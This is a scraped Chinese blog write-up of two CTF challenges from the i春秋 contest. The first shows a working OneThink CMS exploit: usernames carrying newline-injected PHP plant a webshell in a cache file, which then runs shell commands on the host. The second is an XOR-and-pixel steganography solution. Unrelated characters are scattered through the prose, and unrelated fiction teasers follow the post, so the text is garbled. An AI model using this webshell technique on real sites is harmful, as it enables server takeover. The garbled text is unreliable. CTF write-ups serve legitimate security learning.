i春秋“巔峰極客”CTF A Simple CMS&loli WP

保證您更舒適的閱讀體驗(yàn)和持續(xù)更新碍庵，本文已轉(zhuǎn)移至我的個人博客静浴，請您訪問http://anemone.top/以確保您閱讀的文章是最新版本，以及看到新的文章

i春秋辦的CTF得问，自己太菜抚岗，在各種師傅提示下才做出來兩題Orz宣蔚，其他題目找機(jī)會復(fù)現(xiàn)吧。

A Simple CMS

看到網(wǎng)站是OneThink做的亩冬，百度搜了下該CMS存在漏洞，參考文章過程即可得到flag营袜。但是其中的緩存文件做了修改荚板，需要在本地復(fù)現(xiàn)一下跪另，確定緩存文件名免绿。

0x00

掃描網(wǎng)站敏感目錄，發(fā)現(xiàn)www.zip文件：

0x01

下載文件，在本地構(gòu)建復(fù)現(xiàn)環(huán)境婶希，首先刪除onethink/onethink/Application/Install/Data/install.lock文件彤枢，然后訪問install.php。

0x02

依次使用%0a$a=$_GET[a];// 和 <code>%0aecho `$a`;//</code> 注冊賬號业栅，在依次登錄賬號碘裕，發(fā)現(xiàn)存在Runtime/Temp/onethink_d403acece4ebce56a3a4237340fbbe70.php文件，且文件內(nèi)容如下：

<?php
//000000000000a:4:{s:2:"u1";s:13:"Administrator";s:2:"u3";s:6:"test12";s:2:"u4";s:15:"
$a=$_GET[a];//";s:2:"u5";s:13:"
echo `$a`;//";}
?>

說明我們的一句話上傳成功晤斩，文件名為Runtime/Temp/onethink_d403acece4ebce56a3a4237340fbbe70.php，該文件名不改變烹俗。

0x03

在服務(wù)器上重復(fù)步驟2萍程，getshell

在tmp目錄下獲取flag：

http://ddd27aa160354000ba7eba4b621e08cd9274bde410054da1.game.ichunqiu.com/Runtime/Temp/onethink_d403acece4ebce56a3a4237340fbbe70.php?a=cat%20/tmp/flag

loli

0x00

圖片下載下來，根據(jù)題目hint（0xFF）潮尝，想到使用0xFF異或整個文件勉失，腳本如下：

#!/usr/bin/env python
# coding=utf-8

def xor():
    with open('./1.png', 'rb') as f, open('xor.png', 'wb') as wf:
        for each in f.read():
            wf.write(chr(ord(each) ^ 0xff))


if __name__ == '__main__':
    xor()

得到文件xor.png咽弦。

0x01

使用二進(jìn)制編輯器觀察xor.png尾部型型，看到提示“black and white”寺枉，以及“IEND”標(biāo)識型凳，這是png的文件尾部，暗示該文件中隱藏了一個png文件往弓。

end.png

使用 foremost 命令直接提取（binwalk沒卵用槐脏，感謝NaN師傅的提示Orz）：

foremost xor.png
ls ./output/png|grep png
00006777.png

0x02

觀察png文件蔑担，可以看到色塊分為11列啤握，每列隔行的色塊永遠(yuǎn)是黑色排抬，這說明應(yīng)該橫向讀取圖片蹲蒲，而列中的橫長條由8個小色塊組成缘薛，顯然其代表的是一個字節(jié)的數(shù)據(jù)掩宜。

out.png

按上述思路提取該信息：

import matplotlib.image as mpimg  # mpimg 用于讀取圖片5:18

# png[y][x][rgb]

res_str = []
res = []


def readpng():
    png = mpimg.imread('./out.png')
    yy, xx, depth = png.shape
    for y in range(yy):
        if y % 2 == 0:
            for x in range(1, xx - 1, 9):
                _str = "0b" + str(int(png[y][x][0])) + str(int(png[y][x + 1][0])) + str(int(png[y][x + 2][0])) + str(int(png[y][x + 3][0])) + str(int(png[y][x + 4][0])) + str(int(png[y][x + 5][0])) + str(int(png[y][x + 6][0])) + str(int(png[y][x + 7][0]))
                res_str.append(_str)
                res.append(bin2hex(_str))
    print res_str
    with open('res.bin', 'wb') as f:
        for each in res:
            f.write(chr(each))


def bin2hex(_bin="0b101"):
    return int(_bin, 2) ^ 0xFF


if __name__ == '__main__':
    readpng()
    #  bin2hex("0b101")

生成的res.bin實(shí)際為文本文件檐迟，打開即可看到flag：

cat res.bin
Let's look this lyrics:The black sky hangs down,The bright stars follow,The insect winged insect flies,Who are you missing,The space star bursts into tears,The ground rose withers,The cold wind blows the cold wind to blow,So long as has you to accompany,The insect fly rests,A pair of pair only then beautiful,Did not fear darkness only fears brokenheartedly,No matter is tired,Also no matter four cardinal points.Emmmm,It looks like you don't care about this lyrics. Well, this is flag:flag{e0754197-e3ab-4d0d-b98f-96174c378a34}Let's look this lyric

注：相關(guān)文件已上傳至GitHub

最后編輯于：2019.02.03 20:34:16

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者

人面猴
序言：七十年代末瓶逃，一起剝皮案震驚了整個濱河市厢绝，隨后出現(xiàn)的幾起案子昔汉，更是在濱河造成了極大的恐慌拴清，老刑警劉巖，帶你破解...
沈念sama閱讀 217,509評論 6贊 504
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件娄周，死亡現(xiàn)場離奇詭異苹威，居然都是意外死亡，警方通過查閱死者的電腦和手機(jī)掷酗，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 92,806評論 3贊 394
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進(jìn)店門窟哺，熙熙樓的掌柜王于貴愁眉苦臉地迎上來，“玉大人且轨，你說我怎么就攤上這事∮净樱” “怎么了至朗？”我有些...
開封第一講書人閱讀 163,875評論 0贊 354
道士緝兇錄：失蹤的賣姜人
文/不壞的土叔我叫張陵，是天一觀的道長唆香。經(jīng)常有香客問我吨艇，道長，這世上最難降的妖魔是什么冯吓？我笑而不...
開封第一講書人閱讀 58,441評論 1贊 293
?港島之戀（遺憾婚禮）
正文為了忘掉前任软啼，我火速辦了婚禮，結(jié)果婚禮上，老公的妹妹穿的比我還像新娘贿条。我一直安慰自己增热，他們只是感情好，可當(dāng)我...
茶點(diǎn)故事閱讀 67,488評論 6贊 392
惡毒庶女頂嫁案：這布局不是一般人想出來的
文/花漫我一把揭開白布公黑。她就那樣靜靜地躺著摄咆，像睡著了一般。火紅的嫁衣襯著肌膚如雪朝蜘。梳的紋絲不亂的頭發(fā)上涩金，一...
開封第一講書人閱讀 51,365評論 1贊 302
城市分裂傳說
那天，我揣著相機(jī)與錄音副渴，去河邊找鬼慕匠。笑死截型，一個胖子當(dāng)著我的面吹牛轿秧，可吹牛的內(nèi)容都是我干的。我是一名探鬼主播菇篡，決...
沈念sama閱讀 40,190評論 3贊 418
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開眼驱还，長吁一口氣：“原來是場噩夢啊……” “哼！你這毒婦竟也來了闷沥？” 一聲冷哼從身側(cè)響起咐容，我...
開封第一講書人閱讀 39,062評論 0贊 276
萬榮殺人案實(shí)錄
序言：老撾萬榮一對情侶失蹤，失蹤者是張志新（化名）和其女友劉穎路狮，沒想到半個月后蔚约，有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體，經(jīng)...
沈念sama閱讀 45,500評論 1贊 314
?護(hù)林員之死
正文獨(dú)居荒郊野嶺守林人離奇死亡砸抛，尸身上長有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點(diǎn)故事閱讀 37,706評論 3贊 335
?白月光啟示錄
正文我和宋清朗相戀三年直焙，在試婚紗的時候發(fā)現(xiàn)自己被綠了团赏。大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
茶點(diǎn)故事閱讀 39,834評論 1贊 347
活死人
序言：一個原本活蹦亂跳的男人離奇死亡丝里，死狀恐怖体谒，靈堂內(nèi)的尸體忽然破棺而出，到底是詐尸還是另有隱情幌绍，我是刑警寧澤，帶...
沈念sama閱讀 35,559評論 5贊 345
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布颁独，位于F島的核電站伪冰，受9級特大地震影響，放射性物質(zhì)發(fā)生泄漏贮聂。R本人自食惡果不足惜，卻給世界環(huán)境...
茶點(diǎn)故事閱讀 41,167評論 3贊 328
男人毒藥：我在死后第九天來索命
文/蒙蒙一歼冰、第九天我趴在偏房一處隱蔽的房頂上張望耻警。院中可真熱鬧，春花似錦畔勤、人聲如沸扒磁。這莊子的主人今日做“春日...
開封第一講書人閱讀 31,779評論 0贊 22
一樁弒父案，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽兰伤。三九已至钧排，卻和暖如春，著一層夾襖步出監(jiān)牢的瞬間符衔，已是汗流浹背糟袁。一陣腳步聲響...
開封第一講書人閱讀 32,912評論 1贊 269
情欲美人皮
我被黑心中介騙來泰國打工，沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留形帮，地道東北人。一個月前我還...
沈念sama閱讀 47,958評論 2贊 370
代替公主和親
正文我出身青樓界斜，卻偏偏與公主長得像合冀，于是被迫代替她去往敵國和親。傳聞我的和親對象是個殘疾皇子水慨，可洞房花燭夜當(dāng)晚...
茶點(diǎn)故事閱讀 44,779評論 2贊 354

i春秋“巔峰極客”CTF A Simple CMS&loli WP

A Simple CMS

0x00

0x01

0x02

0x03

loli

0x00

0x01

0x02

推薦閱讀更多精彩內(nèi)容